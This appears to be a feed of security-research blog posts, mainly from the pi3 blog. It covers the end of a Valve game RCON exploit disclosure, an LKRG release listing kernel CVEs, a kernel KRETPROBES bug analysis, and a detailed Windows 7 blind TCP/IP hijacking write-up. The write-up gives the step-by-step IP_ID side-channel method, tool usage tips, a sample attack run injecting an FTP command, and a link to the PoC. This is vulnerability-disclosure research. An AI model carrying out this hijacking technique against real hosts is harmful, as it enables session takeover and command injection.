PoC exploit code can be found on my github. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers making the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve seems to now use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. After all, at least a warning is displayed that shows the parameters your game is about to start with for those games. The next image shows how such a warning would look like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. Personally, it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure about the existence of this bug has caused quite a stir regarding Valve’s slow response times to bugs. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run too. The efforts that other researchers have put and are going to put into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.

https://developer.valvesoftware.com/wiki/Source_RCON_Protocol ↩

LKRG 0.9.0 has been released!

pi3 blog

By: pi3

12 April 2021 at 21:54

During LKRG development and testing I’ve found 7 Linux kernel bugs, 4 of them have CVE numbers (however, 1 CVE number covers 2 bugs):

CVE-2021-3411  - Linux kernel: broken KRETPROBES and OPTIMIZER
CVE-2020-27825 - Linux kernel: Use-After-Free in the ftrace ring buffer
                 resizing logic due to a race condition
CVE-2020-25220 - Linux kernel Use-After-Free in backported patch for
                 CVE-2020-14356 (affected kernels: 4.9.x before 4.9.233,
                 4.14.x before 4.14.194, and 4.19.x before 4.19.140)
CVE-2020-14356 - Linux kernel Use-After-Free in cgroup BPF component
                 (affected kernels: since 4.5+ up to 5.7.10)

I’ve also found 2 other issues related to the ftrace UAF bug (CVE-2020-27825):

Deadlock issue which was not really addressed and devs said they will take a look and there is not much updates on that.
Problem with the code related to hwlatd kernel thread – it is incorrectly synchronizing with launcher / killer of it. You can have WARN in kernels all the time.

CVE-2021-3411 refers to 2 different type of bugs:

Broken KRETPROBE (recently reported)
Incompatibility of KPROBE optimizer with the latest changes in the linker.

Additionally, I’ve also found a bug with the kernel signal handling in dying process:

CVE-2020-12826 – Linux kernel prior to 5.6.5 does not sufficiently restrict exit signals

However, I don’t remember if I found it during my work related to LKRG so I’m not counting it here (otherwise it would be total 8 bugs while 5 of them would have CVE).

That’s pretty bad stats… However, it might be an interesting story to say during LKRG announcement of the new version. It could be also interesting talk for conference.

Full announcement can be read here:
https://www.openwall.com/lists/announce/2021/04/12/1

Best regards,
Adam

pi3 blog
Windows 7 TCP/IP hijackingpi3
24 January 2021 at 18:18

Windows 7 TCP/IP hijacking

pi3 blog

By: pi3

24 January 2021 at 18:18

Blind TCP/IP hijacking is still alive on Windows 7… and not only. This version of Windows is certainly one of the “juiciest” targets even though January 14th 2020 was the official EOL (End Of Life) for it. Based on various data Windows 7 holds around 25% share of the Operating Systems (OS) market and is still the world’s second most popular desktop operating system.

A little bit of history

It was a few months before I joined Microsoft as a Security Software Engineer in 2012 when I sent them a report with an interesting bug/vulnerability in all versions of Microsoft Windows including Windows 7 (the latest version at that time). It was an issue in the implementation of TCP/IP stack allowing attackers to carry out a blind TCP/IP hijacking attack. During my discussion with MSRC (Microsoft Security Response Center) they acknowledged the bug exists, but they had their doubts about the impact of the issue claiming “it is very difficult and very unreliable” to exploit. Therefore, they were not going to address it in the current OSes. However, they would fix it in the upcoming OS which was going to be released soon (Windows 8).

I didn’t agree with MSRC’s evaluation. In 2008 I developed a fully working PoC which would automatically find all the necessary primitives (client’s port, SQN and ACK) to perform blind TCP/IP hijacking attack. This tool was exploiting exactly the same weaknesses in TCP/IP stack which I’ve reported. That being said, Microsoft informed me that if I share my tool (I didn’t want to do it), they would reconsider their decision. However, for now, no CVE would be allocated, and this problem was supposed to be addresses in Windows 8.

In the next months I started my work as FTE (Full Time Employee) for Microsoft, and I verified that this problem was fixed in Windows 8. Over the course of years, I completely forgot about it. Nevertheless, when I left Microsoft, I was doing some cleanups on my old laptop and found my old tool. I copied it from the laptop and decided to re-visit it once I will have a bit more time. I found some time and thought that my tool deserves a release and a proper description.

What is TCP/IP hijacking?

Most likely majority of the readers are aware what this is. For those who don’t, I encourage you to read many great articles about it which you can find on the internet these days.

It might be worth to mention that probably the most famous blind TCP/IP hijacking attack was done by Kevin Mitnick against the computers of Tsutomu Shimomura at the San Diego Supercomputer Center on Christmas Day, 1994.

This is a VERY old-school technique which nobody expects to be alive in 2021… Yet, it’s still possible to perform TCP/IP session hijacking today without attacking the PRNG responsible for generating the initials TCP sequence numbers (ISN).

What is the impact of TCP/IP hijacking nowadays?

(Un)fortunately it is not as catastrophic as it used to be. The main reason is that majority of the modern protocols do implement encryption. Sure, it’s overwhelmingly bad if attacker can hijack any TCP/IP session which is established. However, if the upper-layer protocols properly implement encryption, attackers are limited in terms of what they can do with it. Unless they have ability to correctly generate encrypted messages.

That being said, we still have widely deployed protocols which do not encrypt the traffic, e.g., FTP, SMTP, HTTP, DNS, IMAP, and more. Thankfully, protocols like Telnet or Rlogin (hopefully?) can be seen only in the museum.

Where is the bug?

TL;DR: In the implementation of TCP/IP stack for Windows 7, IP_ID is a global counter.

Details:

The tool which I developed in 2008 was implementing a known attack described by ‘lkm’ (there is a typo and real nickname of the author is ‘klm’) in Phrack 64 magazine and can be read here:

http://phrack.org/issues/64/13.html

This is an amazing article (research) and I encourage everyone to carefully study all the details.

Back in 2007 (and 2008) this attack could be executed successfully on many modern OS (modern at that time) including Windows 2K/XP or FreeBSD 4. I gave a live presentation of this attack against Windows XP on a local conference in Poland (SysDay 2009).

Before we move to the details on how to perform described attack, it is useful to refresh how TCP handles the communication in more details. Quoting phrack paper:

Each of the two hosts involved in the connection computes a 32bits SEQ number randomly at the establishment of the connection. This initial SEQ number is called the ISN. Then, each time an host sends some packet with N bytes of data, it adds N to the SEQ number.
The sender put his current SEQ in the SEQ field of each outgoing TCP packet. The ACK field is filled with the next expected SEQ number from the other host. Each host will maintain his own next sequence number (called SND.NEXT), and next expected SEQ number from the other host (called RCV.NEXT.
(…)
TCP implements a flow control mechanism by defining the concept of “window”. Each host has a TCP window size (which is dynamic, specific to each TCP connection, and announced in TCP packets), that we will call RCV.WND.
At any given time, a host will accept bytes with sequence number between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any time, there can be no more than RCV.WND bytes “in transit” to the host.

In short, in order to execute TCP/IP hijacking attack, we must know:

Client IP
Server IP (usually known)
Client port
Server port (usually known)
Sequence number of the client
Sequence number of the server

OK, but what it has to do with IP ID?

In 1998(!), Salvatore Sanfilippo (aka antirez) posted in the Bugtraq mailing list a description of a new port scanning technique which is known today as an “Idle scan”. Original post can be found here:

https://seclists .org/bugtraq/1998/Dec/79

and more information about Idle scan you can read here:

https://nmap.org/book/idlescan.html

In short, if IP_ID is implemented as a global counter (which is the case e.g., in Windows 7), it is simply incremented with each sent IP packet. By “probing” the IP_ID of the victim we know how many packets have been sent between each “probe”. Such “probing” can be performed by sending any packet to the victim which results in a reply to the attacker. ‘lkm’ suggests using an ICMP packet, but it can be any packet with IP header:

[===================================================================]
attacker                                  Host
                --[PING]->
        <-[PING REPLY, IP_ID=1000]--

          ... wait a little ... 

                --[PING]->
        <-[PING REPLY, IP_ID=1010]-- 

<attacker> Uh oh, the Host sent 9 IP packets between my pings.
[===================================================================]

This essentially creates some form of “covert channel” which can be exploited by remote attacker to “discover” all the necessary information to execute TCP/IP Hijacking attack. How? Let’s quote the original phrack article:

Discovering client’s port

Assuming we already know the client/server IP, and the server port, there’s a well known method to test if a given port is the correct client port. In order to do this, we can send a TCP packet with the SYN flag set to server-IP:server-port, from client-IP:guessed-client-port (we need to be able to send spoofed IP packets for this technique to work).

When attacker guessed the valid client’s port, server replies to the real client (not attacker) with ACK. If port was incorrect, server replies to the real client with SYN+ACK. A real client didn’t start a new connection so it replies to the server with RST.

So, all we have to do to test if a guessed client-port is the correct one
is:
– Send a PING to the client, note the IP ID
– Send our spoofed SYN packet
– Resend a PING to the client, note the new IP ID
– Compare the two IP IDs to determine if the guessed port was correct.

Finding the server’s SND.NEXT

This is the essential part, and the best what I can do is to quote (again) phrack article:

Whenever a host receive a TCP packet with the good source/destination ports, but an incorrect seq and/or ack, it sends back a simple ACK with the correct SEQ/ACK numbers. Before we investigate this matter, let’s define exactly what is a correct seq/ack combination, as defined by the RFC793 [2]:
A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) of the host receiving the packet. Typically, the RCV.WND is a fairly large number (several dozens of kilobytes at last).
A correct ACK is an ACK which corresponds to a sequence number of something the host receiving the ACK has already sent. That is, the ACK field of the packet received by an host must be lower or equal than the host’s own current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that were never sent!).
It is important to node that the sequence number space is “circular”. For exemple, the condition used by the receiving host to check the ACK validity is not simply the unsigned comparison “ACK <= receiver’s SND.NEXT”, but the signed comparison “(ACK – receiver’s SND.NEXT) <= 0”.
Now, let’s return to our original problem: we want to guess server’s SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the server, the client will send back an ACK, while if we guess right, the client will send nothing. As for the client-port detection, this may be tested with the IP ID.
If we look at the ACK checking formula, we note that if we pick randomly two ACK values, let’s call them ack1 and ack2, such as |ack1-ack2| = 2^31, then exactly one of them will be valid. For example, let ack1=0 and ack2=2^31. If the real ACK is between 1 and 2^31 then the ack2 will be an acceptable ack. If the real ACK is 0, or is between (2^32 – 1) and (2^31 + 1), then, the ack1 will be acceptable.
Taking this into consideration, we can more easily scan the sequence number space to find the server’s SND.NEXT. Each guess will involve the sending of two packets, each with its SEQ field set to the guessed server’s SND.NEXT. The first packet (resp. second packet) will have his ACK field set to ack1 (resp. ack2), so that we are sure that if the guessed’s SND.NEXT is correct, at least one of the two packet will be accepted.
The sequence number space is way bigger than the client-port space, but two facts make this scan easier:
First, when the client receive our packet, it replies immediately. There’s not a problem with latency between client and server like in the client-port scan. Thus, the time between the two IP ID probes can be very small, speeding up our scanning and reducing greatly the odds that the client will have IP traffic between our probes and mess with our detection.
Secondly, it’s not necessary to test all the possible sequence numbers, because of the receiver’s window. In fact, we need only to do approx. (2^32 / client’s RCV.WND) guesses at worst (this fact has already been mentionned in [6]). Of course, we don’t know the client’s RCV.WND.
We can take a wild guess of RCV.WND=64K, perform the scan (trying each SEQ multiple of 64K). Then, if we didn’t find anything, wen can try all SEQs such as seq = 32K + i64K for all i. Then, all SEQ such as seq=16k + i32k, and so on… narrowing the window, while avoiding to re-test already tried SEQs. On a typical “modern” connection, this scan usually takes less than 15 minutes with our tool.
With the server’s SND.NEXT known, and a method to work around our ignorance of the ACK, we may hijack the connection in the way “server -> client”. This is not bad, but not terribly useful, we’d prefer to be able to send data from the client to the server, to make the client execute a command, etc… In order to do this, we need to find the client’s SND.NEXT.

And here is a small, weird difference in Windows 7. Described scenario perfectly works for Windows XP but I’ve encountered a different behavior in Windows 7. Having two edge cases as ACK value to fulfill ACK formula doesn’t really change anything and I have exactly the same results (just in Windows 7) just by always using one of the edge values for ACK. Originally, I thought that my implementation of attack is not working against Windows 7. However, after some tests and tuning it turns out that’s not the case. I’m not sure why or what I’m missing but, in the end, you can send less packages (twice less) and speed-up the overall attack.

Finding the client’s SND.NEXT

Quote:

What we can do to find the client’s SND.NEXT ? Obviously we can’t use the same method as for the server’s SND.NEXT, because the server’s OS is probably not vunerable to this attack, and besides, the heavy network traffic on the server would render the IP ID analysis infeasible.
However, we know the server’s SND.NEXT. We also know that the client’s SND.NEXT is used for checking the ACK fields of client’s incoming packets.
So we can send packets from the server to the client with SEQ field set to server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK was acceptable.
If we detect that our ACK was acceptable, that means that (guessed_ACK – SND.NEXT) <= 0. Otherwise, it means.. well, you guessed it, that (guessed_ACK – SND_NEXT) > 0.
Using this knowledge, we can find the exact SND_NEXT in at most 32 tries by doing a binary search (a slightly modified one, because the sequence space is circular).
Now, at last we have all the required informations and we can perform the session hijacking from either client or server.

(Un)fortunately, here Windows 7 is different as well. This is connected to the differences in the previous stage of how it handles correctness of ACK. Regardless of the guessed_ACK value ((guessed_ACK - SND.NEXT) <= 0 or (guessed_ACK - SND_NEXT) > 0) Windows 7 won’t send any package back to the server. Essentially, we are blind here and we can’t do the same amazingly effective ‘binary search’ to find the correct ACK. However, we are not completely lost here. We can always brute force ACK if we have the correct SQN. Again, we don’t need to verify every possible value of ACK, we can still use the same trick with TCP window size. Nevertheless, to be more effective and not miss the correct ACK brackets, I’ve chosen to use window size value as 0x3FF. Essentially, we are flooding the server with the spoofed packets containing our payload for injection, with the correct SQN and guessed ACK. This operation takes around 5 minutes and is effective Nevertheless, if for any reason our payload is not injected, a smaller TCP window size (e.g., 0xFF) should be chosen.

Important notes

This type of attack is not limited to any specific OS, but rather leverages “covert channel” generated by implementing IP_ID as a global counter. In short, any OS which is vulnerable to the “Idle scan” is also vulnerable to the old-school blind TCP/IP Hijacking attack.
We need to be able to send spoofed IP packets to execute this attack.
- Our attack relies on “scanning” and constant “poking” of IP_ID:
- Any latency between victim and the server affects such logic.
- If victim’s machine is overloaded (heavy or slow traffic) it obviously affects the attack. Taking appropriate measures of the victim’s networking performance might be necessary for correct tuning of the attack.

Proof-of-Concept

Originally, I implemented lkm’s attack in 2008 and I tested it against Windows XP. When I ran compiled binary on the modern system, everything was working fine. However, when I took the original sources and wanted to recompile it on the modern Linux environment, my tool stopped working(!). New binary was not able to find client’s port neither SQN. However, old binary still worked perfectly fine. It was a riddle for me what was really happening. Output of strace tool gave me some clues:

Generated packet from the old binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\353\234\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=24, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=24, msg_flags=0}, 0) = 40

Generated packet from the new binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\2563\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=28, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=32, msg_flags=0}, 0) = 40

cmsg_len and msg_controllen has different values. However, I didn’t modify the source code so how is it possible? Some GCC/Glibc changes broke the functionality of sending the spoofed package. I’ve found the answer here:

https://sourceware.org/pipermail/libc-alpha/2016-May/071274.html

I needed to rewrite spoofing function to make it functional again on the modern Linux environment. However, to do that I needed to use different API. I wonder how many non-offensive tools were broken by this change

Windows 7

I’ve tested this tool against fully updated Windows 7. Surprisingly, rewriting PoC was not the most difficult task… setting up a fully updated Windows 7 is much more problematic. Many updates break update channel/service(!) itself and you need to manually fix it. Usually, it means manual downloading of the specific KB and installing it in “safe mode”. Then it can “unlock” update service and you can continue your work. In the end it took me around 2-3 days to get fully updated Windows 7 and it looks like this:

192.168.1.132 – attacker’s IP address
192.168.1.238 – victim’s Windows 7 machine IP address
192.168.1.169 – FTP server running on Linux. I’ve tested ProFTPd and vsFTP servers running under git TOT kernel (5.11+)

This tool does not do appropriate “tuning” per victim which could significantly speed-up the attack. However, in my specific case, the full attack which means finding client’s port address, finding server’s SQN and finding client’s SQN took about 45 minutes.

I found old logs from attacking Windows XP (~2009) and the entire attack took almost an hour:

pi3-darkstar z_new # time ./test -r 192.168.254.20 -s 192.168.254.46 -l 192.168.254.31 -p 21 -P 5357 -c 49450 -C “PWD”
                …::: -=[ [d]evil_pi3 TCP/IP Blind Spoofer by Adam ‘pi3’ Zabrocki ]=- :::…
        [+] Trying to find client port
        [+] Found port => 49456!
        [+] Veryfing… OK!

        [+] Second level of verifcation
        [+] Found port => 49456!
        [+] Veryfing… OK!
        [!!] Port is found (49456)! Let’s go further…
        [+] Trying to find server’s window SQN
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [+] Rechecking…
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [!!] SQN => 1874825280, with seq_offset => 65535
        [+] Trying to find server’s real SQN
        [+] Found server’s real SQN => 1874825279 => seq_offset 32767
        [+] Found server’s real SQN => 1874825277 => seq_offset 16383
        [+] Found server’s real SQN => 1874825275 => seq_offset 8191
        [+] Found server’s real SQN => 1874825273 => seq_offset 4095
        [+] Found server’s real SQN => 1874823224 => seq_offset 2047
        [+] Found server’s real SQN => 1874822199 => seq_offset 1023
        [+] Found server’s real SQN => 1874821686 => seq_offset 511
        [+] Found server’s real SQN => 1874821684 => seq_offset 255
        [+] Found server’s real SQN => 1874821555 => seq_offset 127
        [+] Found server’s real SQN => 1874821553 => seq_offset 63
       [+] Found server’s real SQN => 1874821520 => seq_offset 31
        [+] Found server’s real SQN => 1874821518 => seq_offset 15
        [+] Found server’s real SQN => 1874821509 => seq_offset 7
        [+] Found server’s real SQN => 1874821507 => seq_offset 3
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Rechecking…
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [!!] Real server’s SQN => 1874821505
        [+] Finish! check whether command was injected (should be :))
        [!] Next SQN [1874822706]
real    56m38.321s
user    0m8.955s
sys     0m29.181s
pi3-darkstar z_new #

Some more notes:

Sometimes you can see that tool is spinning around the same value when trying to find “server’s real SQN”. If next to the number in the parentheses you see number 1, kill the attack, copy calculated SQN (the one around which value tool was spinning) and paste it as an SQN start parameter (-M). It should fix that edge case.
Sometimes you can encounter the problem that scanning by 64KB window size can ‘overjump’ the appropriate SQN brackets. You might want to reduce the window size to be smaller. However, tools should change the window size automatically if it finishes scanning the full SQN range with current window size and didn’t find the correct value. Nevertheless, it takes time. You might want to start scanning with the smaller window size (but that implies longer attack).
By default, tool sends ICMP message to the victim’s machine to read IP_ID. However, I’ve implemented functionality that it can read that field from any IP packet. It sends standard SYN packet and waits for reply to extract IP_ID. Please give an appropriate TCP port to appropriate parameter (-P)

Tool can be found here:

http://site.pi3.com.pl/exp/devil_pi3.c

Closing words

Modern operating systems (like Windows 10) usually implement IP_ID as a “local” counter per session. If you monitor IP_ID in specific session, you can see it is just incremented per each sent packet. However, each session has independent IP_ID base.

Happy hacking,
Adam

pi3 blog
The short story of broken KRETPROBES and OPTIMIZER in Linux Kernelpi3
15 December 2020 at 19:34

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel

pi3 blog

By: pi3

15 December 2020 at 19:34

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel.

During the LKRG development process I’ve found that:

KRETPROBES are broken since kernel 5.8 (fixed in upcoming kernel)
OPTIMIZER was not doing sufficient job since kernel 5.5

First things first – KPROBES and FTRACE:

Linux kernel provides 2 amazing frameworks for hooking – K*ROBES and FTRACE. K*PROBES is older and a classic one – introduced in 2.6.9 (October 2004). However, FTRACE is a newer interface and might have smaller overhead comparing to K*PROBES. I’m using a word “K*PROBES” because various types of K*PROBES were availble in the kernel, including JPROBES, KRETPROBES or classic KPROBES. K*PROBES essentially enables the possibility to dynamically break into any kernel routine. What are the differences between various K*PROBES?

KPROBES – can be placed on virtually any instruction in the kernel
JPROBES – were implemented using KPROBES. The main idea behind JPROBES was to employ a simple mirroring principle to allow seamless access to the probed function’s arguments. However, since 2017 JPROBEs were depreciated. More information can be found here:
https://lwn.net/Articles/735667/
KRETPROBES – sometimes they are called “return probes” and they also use KPROBES under-the-hood. KRETPROBES allows to easily execute user’s own routine at the entry and return path to the hooked function.However, KRETPROBES can’t be placed on arbitrary instructions.

When a KPROBE is registered, it makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64).

FTRACE are newer comparing to K*PROBES and were initially introduced in kernel 2.6.27, which was released on October 9, 2008. FTRACE works completely differently and the main idea is based on instrumenting every compiled function (injecting a “long-NOP” instruction – GCC’s option “-pg”). When FTRACE is being registered on the specific function, such “long-NOP” is being replaced with JUMP instruction which points to the trampoline code. Later such trampoline can execute any pre-registered user-defined hook.

A few words about Linux Kernel Runtime Guard (LKRG)

In short, LKRG performs runtime integrity checking of the Linux kernel (similar to PatchGuard technology from Microsoft) and detection of the various exploits against the kernel. LKRG attempts to post-detect and promptly respond to unauthorized modifications to the running Linux kernel (system integrity) or to corruption of the task integrity such as credentials (user/group IDs), SECCOMP/sandbox rules, namespaces, and more.
To be able to implement such functionality, LKRG must place various hooks in the kernel. KRETPROBES are used to fulfill that requirement.

LKRG’s KPROBE on FTRACE instrumented functions

A careful reader might ask an interesting question: what will happen if the function is instrumented by the FTRACE (injected “long-NOP”) and someone registers K*PROBES on it? Does dynamically registered FTRACE “overwrite” K*PROBES installed on that function and vice versa?

Well, this is a very common situation from LKRG’s perspective, since it is placing KRETPROBES on many syscalls. Linux kernel uses a special type of K*PROBES in such case and it is called “FTRACE-based KPROBES”. Essentially, such special KPROBE is using FTRACE infrastructure and has very little to do with KPROBES itself. That’s interesting because it is also subject to FTRACE rules e.g. if you disable FTRACE infrastructure, such special KPROBE won’t work either.

OPTIMIZER

Linux kernel developers went one step forward and they aggressively “optimize” all K*PROBES to use FTRACE instead. The main reason behind that is performance – FTRACE has smaller overhead. If for any reason such KPROBE can’t be optimized, then classic old-school KPROBES infrastructure is used.

When you analyze all KRETPROBES placed by LKRG, you will realize that on modern kernels all of them are being converted to some type of FTRACE

LKRG reports False Positives

After such a long introduction finally, we can move on to the topic of this article. Vitaly Chikunov from ALT Linux reported that when he runs FTRACE stress tester, LKRG reports corruption of .text section:

https://github.com/openwall/lkrg/issues/12

I spent a few weeks (month+) on making LKRG detect and accept authorized third-party modifications to the kernel’s code placed via FTRACE. When I finally finished that work, I realized that additionally, I need to protect the global FTRACE knob (sysctl kernel.ftrace_enabled), which allows root to completely disable FTRACE on a running system. Otherwise, LKRG’s hooks might be unknowingly disabled, which not only disables its protections (kind of OK under a threat model where we trust host root), but may also lead to false positives (as without the hooks LKRG wouldn’t know which modifications are legitimate). I’ve added that functionality, and everything was working fine…
… until kernel 5.9. This completely surprised me. I’ve not seen any significant changes between 5.8.x and 5.9.x in FTRACE logic. I spent some time on that and finally I realized that my protection of global FTRACE knob stopped working on latest kernels (since 5.9). However, this code was not changed between kernel 5.8.x and 5.9.x. What’s the mystery?

First problem – KRETPROBES are broken.

Starting from kernel 5.8 all non-optimized KRETPROBES don’t work. Until 5.8, when #DB exception was raised, entry to the NMI was not fully performed. Among others, the following logic was executed:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L589

if (!user_mode(regs)) {
    rcu_nmi_enter();
    preempt_disable();
}

In some older kernels function ist_enter() was called instead. Inside this function we can see the following logic:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L91

if (user_mode(regs)) {
    RCU_LOCKDEP_WARN(!rcu_is_watching(), "entry code didn't wake RCU");
} else {
    /*
     * We might have interrupted pretty much anything.  In
     * fact, if we're a machine check, we can even interrupt
     * NMI processing.  We don't want in_nmi() to return true,
     * but we need to notify RCU.
     */
    rcu_nmi_enter();
}

preempt_disable();

As the comment says “We don’t want in_nmi() to return true, but we need to notify RCU.“. However, since kernel 5.8 the logic of how interrupts are handled was modified and currently we have this (function “exc_int3“):
https://elixir.bootlin.com/linux/v5.8/source/arch/x86/kernel/traps.c#L630

/*
 * idtentry_enter_user() uses static_branch_{,un}likely() and therefore
 * can trigger INT3, hence poke_int3_handler() must be done
 * before. If the entry came from kernel mode, then use nmi_enter()
 * because the INT3 could have been hit in any context including
 * NMI.
 */
if (user_mode(regs)) {
    idtentry_enter_user(regs);
    instrumentation_begin();
    do_int3_user(regs);
    instrumentation_end();
    idtentry_exit_user(regs);
} else {
    nmi_enter();
    instrumentation_begin();
    trace_hardirqs_off_finish();
    if (!do_int3(regs))
        die("int3", regs, 0);
    if (regs->flags & X86_EFLAGS_IF)
        trace_hardirqs_on_prepare();
    instrumentation_end();
    nmi_exit();
}

The root of unlucky change comes from this commit:

https://github.com/torvalds/linux/commit/0d00449c7a28a1514595630735df383dec606812#diff-51ce909c2f65ed9cc668bc36cc3c18528541d8a10e84287874cd37a5918abae5

which was later modified by this commit:

https://github.com/torvalds/linux/commit/8edd7e37aed8b9df938a63f0b0259c70569ce3d2

and this is what we currently have in all kernels since 5.8. Essentially, KRETPROBES are not working since these commits. We have the following logic:

asm_exc_int3() -> exc_int3():
                    |
    ----------------|
    |
    v
...
nmi_enter();
...
if (!do_int3(regs))
       |
  -----|
  |
  v
do_int3() -> kprobe_int3_handler():
                    |
    ----------------|
    |
    v
...
if (!p->pre_handler || !p->pre_handler(p, regs))
                             |
    -------------------------|
    |
    v
...
pre_handler_kretprobe():
...
    if (unlikely(in_nmi())) {
        rp->nmissed++;
        return 0;
    }

Essentially, exc_int3() calls nmi_enter(), and pre_handler_kretprobe() before invoking any registered KPROBE verifies if it is not in NMI via in_nmi() call.

I’ve reported this issue to the maintainers and it was addressed and correctly fixed. These patches are going to be backported to the stable tree (and hopefully to LTS kernels as well):

https://lists.openwall.net/linux-kernel/2020/12/09/1313

However, coming back to the original problem with LKRG… I didn’t see any issues with kernel 5.8.x but with 5.9.x. It’s interesting because KRETPROBES were broken in 5.8.x as well. So what’s going on?

As I mentioned at the beginning of the article, K*PROBES are aggressively optimized and converted to FTRACE. In kernel 5.8.x LKRG’s hook was correctly optimized and didn’t use KRETPROBES at all. That’s why I didn’t see any problems with this version. However, for some reasons, such optimization was not possible in kernel 5.9.x. This results in placing classic non-optimized KRETPROBES which we know is broken.

Second problem – OPTIMIZER isn’t doing sufficient job anymore.

I didn’t see any changes in the sources regarding the OPTIMIZER, neither in the hooked function itself. However, when I looked at the generated vmlinux binary, I saw that GCC generated a padding at the end of the hooked function using INT3 opcode:

...
ffffffff8130528b:       41 bd f0 ff ff ff       mov    $0xfffffff0,%r13d
ffffffff81305291:       e9 fe fe ff ff          jmpq   ffffffff81305194
ffffffff81305296:       cc                      int3
ffffffff81305297:       cc                      int3
ffffffff81305298:       cc                      int3
ffffffff81305299:       cc                      int3
ffffffff8130529a:       cc                      int3
ffffffff8130529b:       cc                      int3
ffffffff8130529c:       cc                      int3
ffffffff8130529d:       cc                      int3
ffffffff8130529e:       cc                      int3
ffffffff8130529f:       cc                      int3

Such padding didn’t exist in this function in generated images for older kernels. Nevertheless, such padding is pretty common.

OPTIMIZER logic fails here:

try_to_optimize_kprobe() -> alloc_aggr_kprobe() -> __prepare_optimized_kprobe()
-> arch_prepare_optimized_kprobe() -> can_optimize():

/* Decode instructions */
addr = paddr - offset;
while (addr < paddr - offset + size) { /* Decode until function end */
    unsigned long recovered_insn;
    if (search_exception_tables(addr))
        /*
         * Since some fixup code will jumps into this function,
         * we can't optimize kprobe in this function.
         */
        return 0;
    recovered_insn = recover_probed_instruction(buf, addr);
    if (!recovered_insn)
        return 0;
    kernel_insn_init(&insn, (void *)recovered_insn, MAX_INSN_SIZE);
    insn_get_length(&insn);
    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;
    /* Recover address */
    insn.kaddr = (void *)addr;
    insn.next_byte = (void *)(addr + insn.length);
    /* Check any instructions don't jump into target */
    if (insn_is_indirect_jump(&insn) ||
        insn_jump_into_range(&insn, paddr + INT3_INSN_SIZE,
                 DISP32_SIZE))
        return 0;
    addr += insn.length;
}

One of the checks tries to protect from the situation when another subsystem puts a breakpoint there as well:

    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;

However, that’s not the case here. INT3_INSN_OPCODE is placed at the end of the function as padding.
I wanted to find out why INT3 padding is more common in the new kernels while it’s not the case for older ones even though I’m using exactly the same compiler and linker. I’ve started browsing commits and I’ve found this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7705dc8557973d8ad8f10840f61d8ec805695e9e

diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
index b06d6e1188deb..3a1a819da1376 100644
--- a/arch/x86/kernel/vmlinux.lds.S
+++ b/arch/x86/kernel/vmlinux.lds.S
@@ -144,7 +144,7 @@ SECTIONS
 		*(.text.__x86.indirect_thunk)
 		__indirect_thunk_end = .;
 #endif
-	} :text = 0x9090
+	} :text =0xcccc
 
 	/* End of text section, which should occupy whole number of pages */
 	_etext = .;

It looks like INT3 is now a default padding used by the linker.

I’ve brought up that problem with the Linux kernel developers (KPROBES owners), and Masami Hiramatsu prepared appropriate patch which fixes the problem:

https://lists.openwall.net/linux-kernel/2020/12/11/265

I’ve verified it and now it works well. Thanks to LKRG development work we helped identify and fix two interesting problems in Linux kernel

Thanks,
Adam

pi3 blog
CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerabilitypi3
16 October 2020 at 18:57

CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability

pi3 blog

By: pi3

16 October 2020 at 18:57

Introduction

